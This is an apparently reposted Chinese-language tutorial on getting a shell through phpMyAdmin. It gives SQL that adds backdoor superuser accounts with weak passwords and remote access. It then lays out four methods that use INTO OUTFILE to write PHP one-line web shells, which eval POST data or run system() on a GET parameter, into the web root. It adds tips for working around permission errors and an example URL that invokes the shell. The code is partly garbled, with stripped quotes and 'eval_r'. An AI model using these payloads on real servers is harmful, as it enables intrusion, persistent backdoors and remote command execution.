PHPmyadmin拿shell的方法有哪些

共计 1807 个字符，预计需要花费 5 分钟才能阅读完成。

自动写代码机器人，免费开通

这篇文章将为大家详细讲解有关 PHPmyadmin 拿 shell 的方法有哪些，丸趣 TV 小编觉得挺实用的，因此分享给大家做个参考，希望大家阅读完这篇文章后可以有所收获。

PHPmyadmin 修改用户密码

直接点击上面的 localhost 或者 1270.0.1，出现用户一栏，点击修改即可

添加超级用户 guetsec 密码 ooxx 并且允许外连

GRANT ALL PRIVILEGES ON *.* TO  guetsec @ %  IDENTIFIED BY  ooxx  WITH GRANT OPTION;

我们可以创建 root 账户设置密码

GRANT ALL PRIVILEGES ON *.* TO  root @ %  IDENTIFIED BY  123456  WITH GRANT OPTION;

这样就创建了 root 外联账户，密码 123456，外链时用 123456

拿 shell 四种经典方法：

方法一：

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (?php @eval_r($_POST[7on])? 
SELECT 7onFROM study INTO OUTFILE  E:/wamp/www/7.php 
---- 以上同时执行，在数据库: mysql  下创建一个表名为：study，字段为 7on，导出到 E:/wamp/www/7.php
  一句话连接密码：7on

方法二：

 读取文件内容： select load_file( E:/xamp/www/s.php 
写一句话： select  ?php @eval_r($_POST[cmd])? INTO OUTFILE  E:/xamp/www/study.php 
cmd 执行权限： select  ?php echo \ pre \ system($_GET[\ cmd\  echo \ /pre \  ?  INTO OUTFILE  E:/xamp/www/study.php

方法三：

JhackJ 版本 PHPmyadmin 拿 shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(?php eval_r($_POST[cmd])? 
select cmd from study into outfile  E:/wamp/www/7.php 
 
Drop TABLE IF EXISTS study;
 
 ?php eval_r($_POST[cmd])? 
--------------------------------------------------------------------------------
 ?php @eval_r($_POST[cmd])? 
 
CREATE TABLE study(cmd text NOT NULL );# MySQL  返回的查询结果为空 (即零行)。INSERT INTO study( cmd ) VALUES (?php eval_r($_POST[cmd])? #  影响列数： 1
SELECT cmdFROM study INTO OUTFILE  E:/wamp/www/7.php #  影响列数： 1
DROP TABLE IF EXISTS study;# MySQL  返回的查询结果为空 (即零行)。

方法四：

select load_file( E:/xamp/www/study.php 
select  ?php echo \ pre \ system($_GET[\ cmd\  echo \ /pre \  ?  INTO OUTFILE  E:/xamp/www/study.php

然后访问网站目录：http://www.2cto.com/study.php?cmd=dir

Phpmyadmin 导出一句话时出现 (Errcode: 13 – Permission denied)

是对此目录没有权限，可以试试上级目录，或者下级目录

再不行试试 NTS 引流

还有就是注意目录 \

关于“PHPmyadmin 拿 shell 的方法有哪些”这篇文章就分享到这里了，希望以上内容可以对大家有一定的帮助，使各位可以学到更多知识，如果觉得文章不错，请把它分享出去让更多的人看到。

向 AI 问一下细节